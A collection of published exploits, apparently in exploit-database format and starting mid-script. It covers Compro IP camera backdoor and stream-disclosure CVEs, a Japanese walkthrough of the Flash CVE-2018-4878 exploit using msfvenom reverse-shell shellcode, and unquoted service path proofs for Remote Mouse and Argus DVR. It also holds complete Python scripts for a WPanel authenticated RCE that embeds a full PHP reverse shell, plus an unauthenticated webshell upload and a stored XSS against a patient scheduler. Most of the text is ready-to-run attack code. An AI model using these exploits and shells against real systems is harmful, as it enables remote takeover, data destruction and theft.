Creating %s bytes DOS payload...." %len(buffer)) f.write(buffer) f.close() print("[!] File Created !") except: print("File cannot be created")
# Exploit Title: Compro Technology IP Camera - 'killps.cgi' Denial-of-Service (DoS) # Date: 2021-09-30 # Exploit Author: icekam,xiao13,Rainbow,tfsec # Software Link: http://www.comprotech.com.hk/ # Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540 # CVE : CVE-2021-40378 A factory-shipped CGI script at this path acts as a backdoor: requesting it in a browser after logging in makes the device delete all of its data, including the camera's own data. Note that this one requires an authenticated session on the device. Payload: visit /cgi-bin/support/killps.cgi after logging in Please refer to: https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
# Exploit Title: Compro Technology IP Camera - 'index_MJpeg.cgi' Stream Disclosure # Date: 2021-09-30 # Exploit Author: icekam,xiao13,Rainbow,tfsec # Software Link: http://www.comprotech.com.hk/ # Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540 # CVE : CVE-2021-40381 The camera's live video page at /cgi-bin/view/index_MJpeg.cgi can be requested without authentication, so anyone who can reach the device can view the video stream. Payload: /cgi-bin/view/index_MJpeg.cgi Please refer to: https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md

タイトル:Flash 0Day CVE-2018-4878脆弱性の再発

0x01はじめに
Adobeは、2018年2月1日にセキュリティ通知を発行しました。
https://helpx.adobe.com/security/products/flash-player/apsa18-01.html
発表は、新しいFlash 0dayの脆弱性(CVE-2018-4878)が野生で悪用され、Windowsユーザーに対するターゲット攻撃を開始できると述べました。攻撃者は、ユーザーにMicrosoft Office Documents、Webページ、スパムメールなどを開くように誘導できます。悪意のあるフラッシュコードファイルを含む。

0x02脆弱性の影響
フラッシュプレーヤーの現在の最新バージョン28.0.0.137およびすべての以前のバージョン

0x03脆弱性の再発
環境テスト:攻撃マシン:Kali、ターゲットマシン:Win7 x64 + IE 8.0 + Flash Player 28.0.0.137
1. CVE-2018-4878 のエクスプロイトをダウンロードします
wget https://raw.githubusercontent.com/backlion/demo/master/cve-2018-4878.rar
2. 圧縮ファイルを解凍すると、CVE-2018-4878.py と exploit.swf が得られます

3. CVE-2018-4878.py を変更する必要があります。元の著者はコード内の stageless 変数を true にしていますが、正しくは stageless=false に変更する必要があります。元の著者のエクスプロイトのアドレス:https://github.com/anbai-inc/cve-2018-4878.git

4. 次に、元の(電卓を起動する)シェルコードを自分のものに差し替える必要があります。

5。KALIの下でMSFのShellCode:を生成します
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<あなたのホスト> LPORT=<あなたのポート> -f python > shellcode.txt

6. 生成したシェルコードで CVE-2018-4878.py 内の shellcode を置き換えます

7. CVE-2018-4878.py を実行して悪意のある exploit.swf と index.html を生成します。両ファイルは同じディレクトリに置く必要があります

8。デモンストレーションのために、index.htmlとexploit.swfをターゲットマシンに一緒にコピーして、IEブラウザで開きました(Webサーバーを構築してアドレスにアクセスすることにより、Webディレクトリにindex.htmlとexploit.swfを配置することもできます)。

9.MSFの下のリスニング設定を設定します
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.0.0.217
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit

10。ターゲットの悪意のあるindex.htmlページが開かれると、リバウンドシェルをトリガーできます。

0x04
脆弱性の修正:公式サイトから最新バージョンにアップグレードします。なお、Adobe Flash Player は 2020 年 12 月 31 日にサポートを終了しており、現在はアップグレードではなくアンインストールすることが推奨されます。
https://get.adobe.com/cn/flashplayer/

Remote Mouse 4.002 - Unquoted Service Path

# Exploit Title: Remote Mouse 4.002 - Unquoted Service Path # Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker # Date: 03.09.2021 # Software Link: https://www.remotemouse.net/downloads/RemoteMouse.exe # Vendor Homepage: https://www.remotemouse.net/ # Version: Remote Mouse 3.008 & 4.002 # Tested on: Windows 10 # Proof of Concept: C:\Users\death>sc qc RemoteMouseService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: RemoteMouseService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Remote Mouse\RemoteMouseService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : RemoteMouseService DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ RemoteMouseService RemoteMouseService C:\Program Files (x86)\Remote Mouse\RemoteMouseService.exe Auto # Note: BINARY_PATH_NAME is unquoted and contains spaces, and the service starts automatically as LocalSystem. Exploitation requires being able to create C:\Program.exe or "C:\Program Files (x86)\Remote.exe", which default Windows ACLs deny to standard users; where such write access exists, the planted binary runs as SYSTEM on the next service start.

WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated)

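# Exploit Title: WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated)
# Date: 07/06/2021
# Exploit Author: Sentinal920
# Vendor Homepage: https://github.com/wpanel
# Software Link: https://github.com/wpanel/wpanel4-cms
# Version: 4.3.1
# Tested on: Linux
"""Authenticated RCE for WPanel 4.3.1 via the gallery "add" upload form.

Flow (same as the original PoC):
  1. GET the front page twice to obtain a session and the ``wpanel_csrf_cookie``.
  2. POST the admin login form with that CSRF token and the admin credentials.
  3. POST a multipart gallery entry whose ``userfile`` is a ``.php`` file; the
     application stores it as-is, so requesting it executes the reverse shell.

Start a listener on LHOST:LPORT before visiting the gallery URLs printed at
the end.  Defaults below are the original PoC's values; all of them can be
overridden on the command line (``--url``, ``--email``, ``--password``,
``--lhost``, ``--lport``).

PHP reverse shell used: https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/php_reverse_shell.php
(works on linux/windows/mac).  NOTE(review): the published listing rendered the
HTML entities in ``dump()`` as bare ``'<'``/``'>'`` (a no-op replace); they are
restored to the upstream ``'&lt;'``/``'&gt;'`` here.
"""
import argparse
import random
import string

# Change These (or pass the matching command-line flags) ##########
URL = 'http://192.168.182.134:8080'
EMAIL = 'admin@localhost.com'
PASSWORD = 'admin'
LHOST = '192.168.182.136'  # reverse-shell listener (was hard-coded inside the PHP)
LPORT = 9000
###################################################################

CSRF_COOKIE = 'wpanel_csrf_cookie'
SHELL_FILENAME = 'php-reverse-shell.php'

# The listener address is substituted into the two placeholders at the bottom.
PHP_REVERSE_SHELL_TEMPLATE = r'''<?php
class Shell {
    private $addr = null;
    private $port = null;
    private $os = null;
    private $shell = null;
    private $descriptorspec = array(
        0 => array('pipe', 'r'), // shell can read from STDIN
        1 => array('pipe', 'w'), // shell can write to STDOUT
        2 => array('pipe', 'w')  // shell can write to STDERR
    );
    private $options = array(); // proc_open() options
    private $buffer = 1024; // read/write buffer size
    private $clen = 0; // command length
    private $error = false; // stream read/write error
    public function __construct($addr, $port) {
        $this->addr = $addr;
        $this->port = $port;
    }
    private function detect() {
        $detected = true;
        if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS
            $this->os = 'LINUX';
            $this->shell = '/bin/sh';
        } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) {
            $this->os = 'WINDOWS';
            $this->shell = 'cmd.exe';
            $this->options['bypass_shell'] = true; // we do not want a shell within a shell
        } else {
            $detected = false;
            echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";
        }
        return $detected;
    }
    private function daemonize() {
        $exit = false;
        if (!function_exists('pcntl_fork')) {
            echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";
        } else if (($pid = @pcntl_fork()) < 0) {
            echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";
        } else if ($pid > 0) {
            $exit = true;
            echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";
        } else if (posix_setsid() < 0) {
            // once daemonized you will actually no longer see the script's dump
            echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";
        } else {
            echo "DAEMONIZE: Completed successfully!\n";
        }
        return $exit;
    }
    private function settings() {
        @error_reporting(0);
        @set_time_limit(0); // do not impose the script execution time limit
        @umask(0); // set the file/directory permissions - 666 for files and 777 for directories
    }
    private function dump($data) {
        $data = str_replace('<', '&lt;', $data);
        $data = str_replace('>', '&gt;', $data);
        echo $data;
    }
    private function read($stream, $name, $buffer) {
        if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream
            $this->error = true; // set global error flag
            echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n";
        }
        return $data;
    }
    private function write($stream, $name, $data) {
        if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream
            $this->error = true; // set global error flag
            echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n";
        }
        return $bytes;
    }
    // read/write method for non-blocking streams
    private function rw($input, $output, $iname, $oname) {
        while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
            if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length
            $this->dump($data); // script's dump
        }
    }
    // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)
    // we must read the exact byte length from a stream and not a single byte more
    private function brw($input, $output, $iname, $oname) {
        $size = fstat($input)['size'];
        if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) {
            // for some reason Windows OS pipes STDIN into STDOUT
            // we do not like that
            // we need to discard the data from the stream
            while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {
                $this->clen -= $bytes;
                $size -= $bytes;
            }
        }
        while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {
            $size -= $bytes;
            $this->dump($data); // script's dump
        }
    }
    public function run() {
        if ($this->detect() && !$this->daemonize()) {
            $this->settings();
            // ----- SOCKET BEGIN -----
            $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
            if (!$socket) {
                echo "SOC_ERROR: {$errno}: {$errstr}\n";
            } else {
                stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS
                // ----- SHELL BEGIN -----
                $process = @proc_open($this->shell, $this->descriptorspec, $pipes, '/', null, $this->options);
                if (!$process) {
                    echo "PROC_ERROR: Cannot start the shell\n";
                } else {
                    foreach ($pipes as $pipe) {
                        stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS
                    }
                    // ----- WORK BEGIN -----
                    @fwrite($socket, "SOCKET: Shell has connected! PID: " . proc_get_status($process)['pid'] . "\n");
                    do {
                        if (feof($socket)) { // check for end-of-file on SOCKET
                            echo "SOC_ERROR: Shell connection has been terminated\n";
                            break;
                        } else if (feof($pipes[1]) || !proc_get_status($process)['running']) { // check for end-of-file on STDOUT or if process is still running
                            echo "PROC_ERROR: Shell process has been terminated\n";
                            break; // feof() does not work with blocking streams
                        }      // use proc_get_status() instead
                        $streams = array(
                            'read'   => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR
                            'write'  => null,
                            'except' => null
                        );
                        $num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], null); // wait for stream changes | will not wait on Windows OS
                        if ($num_changed_streams === false) {
                            echo "STRM_ERROR: stream_select() failed\n";
                            break;
                        } else if ($num_changed_streams > 0) {
                            if ($this->os === 'LINUX') {
                                if (in_array($socket  , $streams['read'])) { $this->rw($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
                                if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
                                if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
                            } else if ($this->os === 'WINDOWS') {
                                // order is important
                                if (in_array($socket, $streams['read'])/*------*/) { $this->rw ($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
                                if (fstat($pipes[2])['size']/*-------*/) { $this->brw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
                                if (fstat($pipes[1])['size']/*-------*/) { $this->brw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
                            }
                        }
                    } while (!$this->error);
                    // ------ WORK END ------
                    foreach ($pipes as $pipe) {
                        fclose($pipe);
                    }
                    proc_close($process);
                }
                // ------ SHELL END ------
                fclose($socket);
            }
            // ------ SOCKET END ------
        }
    }
}
echo '<pre>';
// change the host address and/or port number as necessary
$sh = new Shell('__LHOST__', __LPORT__);
$sh->run();
unset($sh);
// garbage collector requires PHP v5.3.0 or greater
// @gc_collect_cycles();
echo '</pre>';
?>
'''


def random_name(length: int = 9) -> str:
    """Return a random upper-case/digit string used as the gallery title."""
    alphabet = string.ascii_uppercase + string.digits
    return ''.join(random.choice(alphabet) for _ in range(length))


def build_reverse_shell(lhost: str, lport: int) -> str:
    """Return the PHP reverse shell with the listener address filled in.

    Raises ValueError if ``lport`` is not an integer.
    """
    return (PHP_REVERSE_SHELL_TEMPLATE
            .replace('__LHOST__', lhost)
            .replace('__LPORT__', str(int(lport))))


def fetch_csrf_token(session, url: str) -> str:
    """Prime ``session`` against ``url`` and return the CSRF token cookie.

    The original PoC needed two GETs before ``wpanel_csrf_cookie`` showed up
    (the first one establishes the session), so both are kept.
    Raises KeyError if the cookie never appears.
    """
    session.get(url)
    session.get(url)
    return session.cookies[CSRF_COOKIE]


def login(session, url: str, email: str, password: str, token: str) -> str:
    """POST the admin login form and return the CSRF token to use afterwards.

    Credentials go through a dict so requests URL-encodes them (the original
    built the body by string concatenation).  The token is re-read from the
    jar afterwards because some frameworks rotate it per request; the original
    reused the pre-login value and the pre-login cookies.
    Raises requests.HTTPError on a 4xx/5xx login response.
    """
    resp = session.post(url + '/index.php/admin/login',
                        data={'wpanel_csrf_token': token,
                              'email': email,
                              'password': password})
    resp.raise_for_status()
    return session.cookies.get(CSRF_COOKIE, token)


def upload_shell(session, url: str, token: str, name: str, shell_php: str) -> None:
    """Create a gallery entry whose ``userfile`` is the PHP reverse shell.

    requests builds the multipart body (proper CRLF framing) instead of the
    hand-rolled boundary string of the original; the field set is unchanged.
    Raises requests.HTTPError on a 4xx/5xx response.
    """
    resp = session.post(url + '/index.php/admin/galleries/add',
                        data={'wpanel_csrf_token': token,
                              'titulo': name,
                              'descricao': name,
                              'tags': 'tesad',
                              'status': '1'},
                        files={'userfile': (SHELL_FILENAME,
                                            shell_php.encode('utf-8'),
                                            'application/x-php')})
    resp.raise_for_status()


def main(argv=None) -> None:
    """Parse the command line (defaults = the constants above) and run the exploit."""
    import requests  # third-party; imported here so the pure helpers stay importable

    parser = argparse.ArgumentParser(description='WPanel 4.3.1 authenticated RCE (gallery upload)')
    parser.add_argument('--url', default=URL, help='base URL of the WPanel instance')
    parser.add_argument('--email', default=EMAIL, help='admin e-mail')
    parser.add_argument('--password', default=PASSWORD, help='admin password')
    parser.add_argument('--lhost', default=LHOST, help='reverse-shell listener host')
    parser.add_argument('--lport', default=LPORT, type=int, help='reverse-shell listener port')
    args = parser.parse_args(argv)

    url = args.url.rstrip('/')
    name = random_name()
    shell_php = build_reverse_shell(args.lhost, args.lport)

    # One Session carries the session + CSRF cookies through login and upload;
    # the original sent the cookies of the very first GET to every request.
    with requests.Session() as session:
        token = fetch_csrf_token(session, url)
        token = login(session, url, args.email, args.password, token)
        upload_shell(session, url, token, name, shell_php)

    print('')
    print('Shell Uploaded as: ' + name)
    print('')
    print('Visit: ' + url + '/index.php/admin/galleries')
    print('OR')
    print('Visit: ' + url + '/index.php/galleries')
    print('')
    # TODO: the original listed exploit_post / exploit_pages /
    # dashboard_avatar_image as further upload paths but never implemented them.


if __name__ == '__main__':
    main()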

Argus Surveillance DVR 4.0 - Unquoted Service Path

# Exploit Title: Argus Surveillance DVR 4.0 - Unquoted Service Path
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
# Date: 03.09.2021
# Version: Argus Surveillance DVR 4.0
# Tested on: Windows 10
# Note: "Start as service on Windows Startup" must be enabled in Program Options

# Proof of Concept:

C:\Users\death>sc qc ARGUSSURVEILLANCEDVR_WATCHDOG
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ARGUSSURVEILLANCEDVR_WATCHDOG
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Argus Surveillance DVR Watchdog
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Argus Surveillance DVR Watchdog  ARGUSSURVEILLANCEDVR_WATCHDOG  C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe  Auto

# Why this is exploitable: BINARY_PATH_NAME contains spaces but is not quoted, the
# service is AUTO_START and runs as LocalSystem. On start the service manager tries
# C:\Program.exe, then "C:\Program Files\Argus.exe", then
# "C:\Program Files\Argus Surveillance.exe" before the real binary, so a user who can
# write to C:\ or C:\Program Files\ gets code execution as SYSTEM on the next
# reboot/service restart. Default Windows ACLs do not grant standard users that
# write access, so verify the directory permissions (e.g. with icacls) before
# counting this as a working privilege escalation on a given host.
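# Exploit Title: Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload
# Date: 03/09/2021
# Exploit Author: a-rey
# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14928
# Version: v1.0
# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0
# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Unauthenticated file upload in Patient Appointment Scheduler System v1.0.

``classes/SystemSettings.php?f=update_settings`` accepts a file in the ``img``
(or ``cover``) field without authentication and stores it under ``/uploads``
as ``<unix_time>_<original_name>``.  Because the server's timestamp is not
returned, the script probes every second in ``+/- delay`` around the local
upload time until it finds a URL that does not redirect.
"""
import argparse
import logging
import os
import time

BANNER = """
╔═════════════════════════════════════════════════════════════════════════════════════════════════╗
║ Patient Appointment Scheduler System v1.0 - Unauthenticated File Upload & Remote Code Execution ║
╚═════════════════════════════════════════════════════════════════════════════════════════════════╝
by:
\033[0m\033[1;31m █████╗  ██████╗ ███████╗██╗   ██╗\033[0m
\033[0m\033[1;32m██╔══██╗ ██╔══██╗██╔════╝██║   ██║\033[0m
\033[0m\033[1;33m███████║ ██████╔╝█████╗   ██╗ ██═╝\033[0m
\033[0m\033[1;34m██╔══██║ ██╔══██╗██╔══╝    ██╔╝   \033[0m
\033[0m\033[1;35m██║  ██║ ██║  ██║███████╗  ██║    \033[0m
\033[0m\033[1;36m╚═╝  ╚═╝ ╚═╝  ╚═╝╚══════╝  ╚═╝    \033[0m
"""

# Custom level above CRITICAL so the "GOOD" line is never filtered out.
SUCCESS = logging.CRITICAL + 1


def log_success(msg: str, *args) -> None:
    """Log ``msg`` at the SUCCESS level through the public logging API.

    The original monkey-patched ``logging.success`` onto the module at run
    time and called the private ``Logger._log``; this is the same output.
    """
    logging.getLogger(__name__).log(SUCCESS, msg, *args)


def candidate_upload_urls(url: str, basename: str, upload_time: int, delay: int) -> list[str]:
    """Return the upload URLs to probe, oldest first.

    The target prefixes the stored file name with its own ``int(time())``, so
    every second in ``[upload_time - delay, upload_time + delay]`` is a candidate.
    """
    return [f'{url}/uploads/{t}_{basename}'
            for t in range(upload_time - delay, upload_time + delay + 1)]


def exploit(url: str, file: str, delay: int) -> None:
    """Upload ``file`` as a webshell and locate it on the target.

    Args:
        url:   base URL of the application (trailing slash is tolerated).
        file:  local path of the PHP webshell to upload.
        delay: clock-skew window, in seconds, for the server-side timestamp.

    Logs the outcome; returns nothing.  Network errors from requests propagate.
    """
    if not os.path.exists(file):
        logging.error(f'webshell payload "{file}" does not exist?')
        return

    import requests  # third-party; imported after the local check so helpers stay importable

    url = url.rstrip('/')
    basename = os.path.basename(file)
    logging.info(f'uploading webshell payload "{basename}" to {url}/uploads ...')
    # Taken before the POST so the probe window brackets the server's timestamp.
    upload_time = int(time.time())
    with open(file, 'rb') as fh:  # the original leaked this handle
        r = requests.post(url + '/classes/SystemSettings.php',
                          files={'img': (basename, fh)},  # NOTE: 'cover' works too, 'img' is more inconspicuous
                          params={'f': 'update_settings'},
                          verify=False)
    if not r.ok:
        logging.error('HTTP upload request failed')
        return

    logging.info(f'finding new payload file name on target (+/- {delay} seconds) ...')
    for candidate in candidate_upload_urls(url, basename, upload_time, delay):
        logging.debug(f'trying {candidate} ...')
        # verify=False kept consistent with the upload request (the original dropped it here).
        r = requests.get(candidate, allow_redirects=False, verify=False)
        # The site answers 302 for every missing file, so anything else means it exists.
        if r.status_code != 302:
            log_success(f'webshell payload found on target at {candidate}')
            return
    logging.error('failed to find payload on target')
    logging.warning('maybe need a larger delay or uploads directory is not writable?')


def main() -> None:
    """Parse arguments, configure coloured logging, print the banner and run."""
    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
    parser.add_argument('-u', '--url', help='website URL', type=str, required=True)
    parser.add_argument('-p', '--payload', help='PHP webshell file to upload', type=str, required=True)
    parser.add_argument('-d', '--delay', help='delay (seconds) for file timestamp in payload name on target',
                        type=int, required=False, default=60)
    parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False)
    args = parser.parse_args()

    logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s',
                        datefmt='%d %b %Y %H:%M:%S',
                        level='DEBUG' if args.debug else 'INFO')
    logging.addLevelName(SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
    logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m')
    logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
    logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m')

    print(BANNER)
    exploit(args.url, args.payload, args.delay)


if __name__ == '__main__':
    main()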
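# Exploit Title: Patient Appointment Scheduler System 1.0 - Persistent/Stored XSS
# Date: 03/09/2021
# Exploit Author: a-rey
# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14928
# Version: v1.0
# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0
# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Stored XSS in Patient Appointment Scheduler System v1.0.

``classes/SystemSettings.php?f=update_settings`` accepts an ``about_us`` field
without authentication and writes it, unescaped, into the page served at the
site root.  The script submits the contents of a local file as that field and
then confirms the same bytes come back on the main page.
"""
import argparse
import logging
import os

BANNER = """
╔═══════════════════════════════════════════════════════════════════╗
║ Patient Appointment Scheduler System v1.0 - Persistent/Stored XSS ║
╚═══════════════════════════════════════════════════════════════════╝
by:
\033[0m\033[1;31m █████╗  ██████╗ ███████╗██╗   ██╗\033[0m
\033[0m\033[1;32m██╔══██╗ ██╔══██╗██╔════╝██║   ██║\033[0m
\033[0m\033[1;33m███████║ ██████╔╝█████╗   ██╗ ██═╝\033[0m
\033[0m\033[1;34m██╔══██║ ██╔══██╗██╔══╝    ██╔╝   \033[0m
\033[0m\033[1;35m██║  ██║ ██║  ██║███████╗  ██║    \033[0m
\033[0m\033[1;36m╚═╝  ╚═╝ ╚═╝  ╚═╝╚══════╝  ╚═╝    \033[0m
"""

# Custom level above CRITICAL so the "GOOD" line is never filtered out.
SUCCESS = logging.CRITICAL + 1


def log_success(msg: str, *args) -> None:
    """Log ``msg`` at the SUCCESS level through the public logging API.

    The original monkey-patched ``logging.success`` onto the module at run
    time and called the private ``Logger._log``; this is the same output.
    """
    logging.getLogger(__name__).log(SUCCESS, msg, *args)


def exploit(url: str, file: str) -> None:
    """Inject the contents of ``file`` via ``about_us`` and verify the injection.

    Args:
        url:  base URL of the application (trailing slash is tolerated).
        file: local file whose contents are used as the XSS payload.

    Logs the outcome; returns nothing.  Network errors from requests propagate.
    """
    if not os.path.exists(file):
        logging.error(f'{file} does not exist?')
        return

    import requests  # third-party; imported after the local check so the module stays importable

    url = url.rstrip('/')
    logging.info(f'reading {file} for XSS content ...')
    with open(file, 'r', encoding='utf-8') as fh:
        xss_payload = fh.read()

    # Report the encoded size: the original logged len() of the str as "bytes".
    payload_bytes = len(xss_payload.encode('utf-8'))
    logging.info(f'sending XSS payload ({payload_bytes} bytes) to {url}/classes/SystemSettings.php ...')
    r = requests.post(url + '/classes/SystemSettings.php',
                      data={'about_us': xss_payload},
                      params={'f': 'update_settings'},
                      verify=False)
    if not r.ok:
        logging.error('HTTP request failed')
        return

    logging.info('checking for XSS payload on main page ...')
    # verify=False kept consistent with the POST (the original dropped it here).
    r = requests.get(url, verify=False)
    if xss_payload not in r.text:
        logging.error(f'XSS injection failed? received: {r.text}')
        logging.warning('maybe about.html is not writable?')
        return
    log_success('XSS payload found on target website')


def main() -> None:
    """Parse arguments, configure coloured logging, print the banner and run."""
    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
    parser.add_argument('-u', '--url', help='website URL', type=str, required=True)
    parser.add_argument('-f', '--file', help='file with DOM content to inject', type=str, required=True)
    parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False)
    args = parser.parse_args()

    logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s',
                        datefmt='%d %b %Y %H:%M:%S',
                        level='DEBUG' if args.debug else 'INFO')
    logging.addLevelName(SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
    logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m')
    logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
    logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m')

    print(BANNER)
    exploit(args.url, args.file)


if __name__ == '__main__':
    main()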